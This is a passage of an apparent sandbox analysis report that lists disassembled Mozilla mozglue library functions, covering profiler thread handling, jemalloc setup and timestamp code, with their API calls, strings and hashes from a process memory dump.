                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8CF716
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8C94EE
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C8C9508
                                                                                                                                                                                                                        • Part of subcall function 6C88B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C88B5E0
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF739
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF746
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF793
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C90385B,00000002,?,?,?,?,?), ref: 6C8CF829
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,00000000,?), ref: 6C8CF84C
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C8CF866
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8CFA0C
                                                                                                                                                                                                                        • Part of subcall function 6C895E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8955E1), ref: 6C895E8C
                                                                                                                                                                                                                        • Part of subcall function 6C895E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C895E9D
                                                                                                                                                                                                                        • Part of subcall function 6C895E60: GetCurrentThreadId.KERNEL32 ref: 6C895EAB
                                                                                                                                                                                                                        • Part of subcall function 6C895E60: GetCurrentThreadId.KERNEL32 ref: 6C895EB8
                                                                                                                                                                                                                        • Part of subcall function 6C895E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C895ECF
                                                                                                                                                                                                                        • Part of subcall function 6C895E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C895F27
                                                                                                                                                                                                                        • Part of subcall function 6C895E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C895F47
                                                                                                                                                                                                                        • Part of subcall function 6C895E60: GetCurrentProcess.KERNEL32 ref: 6C895F53
                                                                                                                                                                                                                        • Part of subcall function 6C895E60: GetCurrentThread.KERNEL32 ref: 6C895F5C
                                                                                                                                                                                                                        • Part of subcall function 6C895E60: GetCurrentProcess.KERNEL32 ref: 6C895F66
                                                                                                                                                                                                                        • Part of subcall function 6C895E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C895F7E
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8CF9C5
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8CF9DA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • [D %d/%d] profiler_register_thread(%s), xrefs: 6C8CF71F
                                                                                                                                                                                                                      • " attempted to re-register as ", xrefs: 6C8CF858
                                                                                                                                                                                                                      • Thread , xrefs: 6C8CF789
                                                                                                                                                                                                                      • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C8CF9A6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                                                                                                                                                                                      • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                                                                                                                                                                                                      • API String ID: 882766088-1834255612
                                                                                                                                                                                                                      • Opcode ID: 7d859c85a76f7f25701bda592d1eca208aebe216ed18956deeeb53b3e269e431
                                                                                                                                                                                                                      • Instruction ID: bdee0c47411c9725b9978c9fc0f1615d945e8f14a66becdeb230a5a9c26f7c3a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d859c85a76f7f25701bda592d1eca208aebe216ed18956deeeb53b3e269e431
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B18103717047009FEB209F68CA40AAAB7B5FFD5308F50496DE84997B51EB30E949CB93
                                                                                                                                                                                                                      Function 6C894180 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 180libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C894196
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000110,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C8941F1
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C894223
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C89422A
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C894231
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C894238
                                                                                                                                                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C894245
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(Shcore.dll,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C894263
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 6C89427A
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 6C894299
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C8942C4
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8942F6
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C894302
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C894309
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C894310
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C894317
                                                                                                                                                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C894324
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ConditionMask$InfoLibraryVerifyVersionmemset$AddressDown@mozilla@@FreeLoadLockedProcWin32k
                                                                                                                                                                                                                      • String ID: SetProcessDpiAwareness$Shcore.dll
                                                                                                                                                                                                                      • API String ID: 3038791930-999387375
                                                                                                                                                                                                                      • Opcode ID: 6e9f728fdb41b87aa582a98afdc9856d707fd49cb7520fd56e112b7b27b2f4db
                                                                                                                                                                                                                      • Instruction ID: 52f71ea6efcd94c49981e3fdab7af98d714a28c8b6bac74a40a1ce1c2ed1265f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e9f728fdb41b87aa582a98afdc9856d707fd49cb7520fd56e112b7b27b2f4db
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3951F371B04214ABEB206B788E49FAA777CEFC6B54F11492CF915A76C0CB709D50CB91
                                                                                                                                                                                                                      Function 6C8CEE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CEE60
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CEE6D
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CEE92
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C8CEEA5
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 6C8CEEB4
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C8CEEBB
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CEEC7
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8CEECF
                                                                                                                                                                                                                        • Part of subcall function 6C8CDE60: GetCurrentThreadId.KERNEL32 ref: 6C8CDE73
                                                                                                                                                                                                                        • Part of subcall function 6C8CDE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C894A68), ref: 6C8CDE7B
                                                                                                                                                                                                                        • Part of subcall function 6C8CDE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C894A68), ref: 6C8CDEB8
                                                                                                                                                                                                                        • Part of subcall function 6C8CDE60: free.MOZGLUE(00000000,?,6C894A68), ref: 6C8CDEFE
                                                                                                                                                                                                                        • Part of subcall function 6C8CDE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C8CDF38
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: GetCurrentProcess.KERNEL32(?,6C8831A7), ref: 6C8BCBF1
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C8831A7), ref: 6C8BCBFA
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CEF1E
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CEF2B
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CEF59
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CEFB0
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CEFBD
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CEFE1
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CEFF8
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8CF000
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8C94EE
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C8C9508
                                                                                                                                                                                                                      • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C8CF02F
                                                                                                                                                                                                                        • Part of subcall function 6C8CF070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C8CF09B
                                                                                                                                                                                                                        • Part of subcall function 6C8CF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C8CF0AC
                                                                                                                                                                                                                        • Part of subcall function 6C8CF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C8CF0BE
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • [I %d/%d] profiler_pause, xrefs: 6C8CF008
                                                                                                                                                                                                                      • [I %d/%d] profiler_stop, xrefs: 6C8CEED7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                                                                                                                                                                                      • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                                                                                                                                                                                                      • API String ID: 16519850-1833026159
                                                                                                                                                                                                                      • Opcode ID: 657168f8bbb5dd4eb63bf002f6e4a6128f6384915b9b9ffaf9e60d4c64114413
                                                                                                                                                                                                                      • Instruction ID: 95f5e38d8caf03087e4e9967483252bd2d3fbcd60268665112c985ff27806b0a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 657168f8bbb5dd4eb63bf002f6e4a6128f6384915b9b9ffaf9e60d4c64114413
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A51BF31708214DFDB20AB68D509BA677B8EB4626CF30096DEE1983F40DB748904C7AA
                                                                                                                                                                                                                      Function 6C8BD010 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 215COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90E804), ref: 6C8BD047
                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 6C8BD093
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C8BD0A6
                                                                                                                                                                                                                      • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C90E810,00000040), ref: 6C8BD0D0
                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6C90E7B8,00001388), ref: 6C8BD147
                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6C90E744,00001388), ref: 6C8BD162
                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6C90E784,00001388), ref: 6C8BD18D
                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6C90E7DC,00001388), ref: 6C8BD1B1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
                                                                                                                                                                                                                      • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
                                                                                                                                                                                                                      • API String ID: 2957312145-326518326
                                                                                                                                                                                                                      • Opcode ID: 3685c57c9f9ef51a9974b7810495d960f79063470521dff170c84686143e537a
                                                                                                                                                                                                                      • Instruction ID: 3d8cbd0ee0f0a2c2c1190dc9bee1c5abeed12652969c2594e912c09bbbc1e8e9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3685c57c9f9ef51a9974b7810495d960f79063470521dff170c84686143e537a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA81F570B08204AFEB249F68CA54B6A77F5FB46705F20092EE991E7B84D771D805CBD1
                                                                                                                                                                                                                      Function 6C8CFAA0 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 193threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CFADC
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CFAE9
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CFB31
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CFB43
                                                                                                                                                                                                                      • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C8CFBF6
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CFC50
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • [I %d/%d] profiler_unregister_thread() - thread %llu already unregistered, xrefs: 6C8CFD15
                                                                                                                                                                                                                      • [D %d/%d] profiler_unregister_thread: %s, xrefs: 6C8CFC94
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CurrentThread$D@std@@ExclusiveLockMarkerTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Marker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfileProfilerReleaseStringView@
                                                                                                                                                                                                                      • String ID: [D %d/%d] profiler_unregister_thread: %s$[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered
                                                                                                                                                                                                                      • API String ID: 2101194506-3679350629
                                                                                                                                                                                                                      • Opcode ID: bebff4e52e40fc6176a13e156de763c5daa1e70e311d96d89380bf16744594b8
                                                                                                                                                                                                                      • Instruction ID: 9a59b28b230bf55a462a740376042814dd0b2a4617fe578717f9225461ebe186
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bebff4e52e40fc6176a13e156de763c5daa1e70e311d96d89380bf16744594b8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB71AD71B08700CFE724DF28C644A6AB7F5EF95308F22496EE94987B51EB30D945CB92
                                                                                                                                                                                                                      Function 6C895E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C895E9D
                                                                                                                                                                                                                        • Part of subcall function 6C8A5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C8A56EE,?,00000001), ref: 6C8A5B85
                                                                                                                                                                                                                        • Part of subcall function 6C8A5B50: EnterCriticalSection.KERNEL32(6C90F688,?,?,?,6C8A56EE,?,00000001), ref: 6C8A5B90
                                                                                                                                                                                                                        • Part of subcall function 6C8A5B50: LeaveCriticalSection.KERNEL32(6C90F688,?,?,?,6C8A56EE,?,00000001), ref: 6C8A5BD8
                                                                                                                                                                                                                        • Part of subcall function 6C8A5B50: GetTickCount64.KERNEL32 ref: 6C8A5BE4
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C895EAB
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C895EB8
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C895ECF
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C896017
                                                                                                                                                                                                                        • Part of subcall function 6C884310: moz_xmalloc.MOZGLUE(00000010,?,6C8842D2), ref: 6C88436A
                                                                                                                                                                                                                        • Part of subcall function 6C884310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C8842D2), ref: 6C884387
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000004), ref: 6C895F47
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6C895F53
                                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 6C895F5C
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6C895F66
                                                                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C895F7E
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000024), ref: 6C895F27
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: mozalloc_abort.MOZGLUE(?), ref: 6C89CAA2
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8955E1), ref: 6C895E8C
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8955E1), ref: 6C89605D
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8955E1), ref: 6C8960CC
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                                                                                                                                                                      • String ID: GeckoMain
                                                                                                                                                                                                                      • API String ID: 3711609982-966795396
                                                                                                                                                                                                                      • Opcode ID: 43fa474ac1f5cd04ffb37bccd5db205a8b83722a0eb7f2124a1fac5aca8820fd
                                                                                                                                                                                                                      • Instruction ID: 647a1c7b9ec518589402f94af0eb1e060f85cb5a17bd0106c51b9236df899d5a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43fa474ac1f5cd04ffb37bccd5db205a8b83722a0eb7f2124a1fac5aca8820fd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F71A0B0A097409FD720DF28C580A6ABBF0FF59308F544D6DE98687B52D771E948CB92
                                                                                                                                                                                                                      Function 6C899590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8831C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C883217
                                                                                                                                                                                                                        • Part of subcall function 6C8831C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C883236
                                                                                                                                                                                                                        • Part of subcall function 6C8831C0: FreeLibrary.KERNEL32 ref: 6C88324B
                                                                                                                                                                                                                        • Part of subcall function 6C8831C0: __Init_thread_footer.LIBCMT ref: 6C883260
                                                                                                                                                                                                                        • Part of subcall function 6C8831C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C88327F
                                                                                                                                                                                                                        • Part of subcall function 6C8831C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C88328E
                                                                                                                                                                                                                        • Part of subcall function 6C8831C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C8832AB
                                                                                                                                                                                                                        • Part of subcall function 6C8831C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C8832D1
                                                                                                                                                                                                                        • Part of subcall function 6C8831C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C8832E5
                                                                                                                                                                                                                        • Part of subcall function 6C8831C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C8832F7
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C899675
